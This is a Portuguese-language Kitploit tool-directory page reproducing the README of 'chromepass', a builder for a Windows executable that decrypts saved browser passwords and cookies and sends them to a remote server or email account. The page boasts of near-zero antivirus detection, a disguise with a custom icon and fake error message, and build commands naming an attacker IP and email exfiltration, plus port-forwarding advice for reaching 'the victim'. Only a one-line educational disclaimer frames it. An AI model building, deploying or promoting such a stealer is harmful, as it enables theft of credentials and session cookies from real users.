Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
chromepass — Chromepass - Hackeando senhas salvas do Chrome | Kitploit
Ferramentas/GitHubGitHub/darkarp/chromepass
Quebra de SenhasExfiltração de DadosPhishingRed Teaming
GitHubdarkarp/chromepass

chromepass

Chromepass - Hackeando senhas salvas do Chrome

Ver Repositório
838111há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Chromepass - Hackeando Senhas e Cookies Salvos do Chrome

Lançamento Status de Build no CircleCI
Qualidade do código Scrutinizer (GitHub/Bitbucket)
Issues abertas do GitHub Issues fechadas do GitHub
Entrar
Ver Demonstração · Reportar Bug · Solicitar Funcionalidade

Índice

  • Sobre o Projeto
    • Detecção por Antivírus
  • Introdução
    • Pré-requisitos
    • Instalação
  • Uso
  • Email
  • Erros, Bugs e Solicitações de Funcionalidades
  • Saiba Mais
  • Licença
  • Demonstração

Sobre o Projeto

Chromepass é uma aplicação de console baseada em Python que gera um executável para Windows com as seguintes funcionalidades:

  • Descriptografar senhas e cookies salvos do Google Chrome, Chromium, Edge, Brave, Opera e Vivaldi
  • Enviar um arquivo com as combinações de login/senha e cookies remotamente (servidor HTTP ou email)
  • Indetectável por antivírus se feito corretamente
  • Ícone personalizado
  • Mensagem de erro personalizada
  • Personalizar porta

Detecção por Antivírus!

A nova metodologia de construção do cliente praticamente garante uma taxa de detecção de 0%, mesmo sem táticas de evasão de antivírus. Se isso se tornar falso no futuro, alguns métodos serão implementados para melhorar a evasão de antivírus.

Exemplo de varreduras recentes (nota: dentro de 10-12 horas passamos de 0-2 detecções para 32 detecções, então execute a análise em suas próprias construções):

  • VirusTotal Scan 1
  • VirusTotal Scan 2
  • VirusTotal Scan 3
  • VirusTotal Scan 4

Introdução

Dependências e Requisitos

Esta é uma aplicação muito simples, que utiliza apenas:

  • Python - Testado no Python 3.9+

Recomenda-se realizar a instalação dentro de uma VM Windows. Algumas partes do procedimento de instalação podem ser afetadas por configurações existentes. Isso foi testado em uma VM Windows 10 limpa.

Instalação

Chromepass requer Windows para compilar! Suporte para Linux e macOS pode ser adicionado em breve.

Clonar o repositório:

root@kitploit:~
git clone https://github.com/darkarp/chromepass

Nota: Alternativamente, você pode baixar a versão mais recente, já que o repositório pode ser mais propenso a bugs.

Instalar as dependências:

As dependências são verificadas e instaladas automaticamente, então você pode pular para Uso. Recomenda-se usar uma VM limpa, apenas para garantir que não haja conflitos.

Se você não tiver as dependências e sua internet não for rápida, isso levará um tempo. Vá pegar um café.


Uso

Chromepass é muito direto. Comece executando:

root@kitploit:~
python create.py -h

Uma lista de opções aparecerá e são autoexplicativas.

Executar sem parâmetros criará o servidor e o cliente conectando-se a 127.0.0.1.

Um exemplo simples de uma construção:

root@kitploit:~
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

Depois de criar o servidor e o cliente, certifique-se de que o servidor esteja em execução quando o cliente for executado.

Os cookies e senhas serão salvos em arquivos json em uma nova pasta chamada data no mesmo diretório do servidor, separados por endereço IP.


Email

Chromepass suporta o envio dos arquivos por email, embora ainda seja experimental. Para ativar isso, use a flag --email ao criar o servidor. Você precisará de duas coisas: um nome de usuário (seu email) e uma senha (uma senha de aplicativo).

Para gerar uma senha de aplicativo, vá para suas configurações de conta -> Segurança e ative a autenticação em duas etapas (obrigatório!)

Após a autenticação em duas etapas estar ativada, você verá uma nova opção chamada Senhas de aplicativo: 2-step-authentication

Clique lá e escolha as opções apropriadas e, em seguida, gere uma senha: 2-step-authentication

Após clicar em Gerar, você receberá a senha necessária. Você pode usar o nome de usuário e senha diretamente no comando, ou simplesmente colocá-los no config.ini, onde está escrito YOUR_USERNAME e YOUR_PASSWORD.

Exemplo com credenciais no comando

root@kitploit:~
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

Se você colocar as credenciais no arquivo config (você verá onde se abrir este arquivo)

root@kitploit:~
python create.py --error --message 'An Error has happened' --email

Notas sobre uso remoto

Se você deseja usar isso em um cenário remoto, também deve fazer o encaminhamento de porta (porta 80 por padrão), para que quando a vítima executar o cliente, ele consiga se conectar ao servidor na porta correta.
Para informações mais gerais, clique aqui. Se ainda assim não estiver satisfeito, faça uma pesquisa no Google.


Instalação manual de dependências

A configuração automatizada é experimental. Por uma razão ou outra, a configuração pode falhar ao instalar corretamente as dependências. Nesse caso, você deve instalá-las manualmente.
Felizmente, existem apenas 2 dependências:

  • Microsoft Visual C++ Build Tools (instale com os fluxos de trabalho recomendados)
  • Rustup

Em vez das ferramentas de compilação, você também pode instalar o Visual Studio, mas ocupará mais espaço.

Após instalar com sucesso as ferramentas de compilação, basta executar o rustup-init.exe do site Rustup.

Isso completa as dependências necessárias e você deve estar pronto para prosseguir.


Erros, Bugs e Solicitações de Funcionalidades

Se você encontrar um erro ou bug, por favor, reporte-o como uma issue. Se desejar sugerir uma funcionalidade ou melhoria, por favor, reporte-o nas páginas de issues.

Por favor, siga os modelos mostrados ao criar a issue.


Saiba Mais

Para acesso a uma comunidade cheia de aspirantes a especialistas em segurança de computadores, desde o iniciante completo até o veterano experiente, entre no nosso Servidor Discord: WhiteHat Hacking

Se você deseja entrar em contato comigo, pode fazê-lo através de: [email protected]


Aviso Legal

Não sou responsável pelo que você faz com as informações e código fornecidos. Isso é destinado apenas para fins profissionais ou educacionais.

Licença

AGPL-3.0


Code Intelligence Status

Demonstração

til

Baixar ferramenta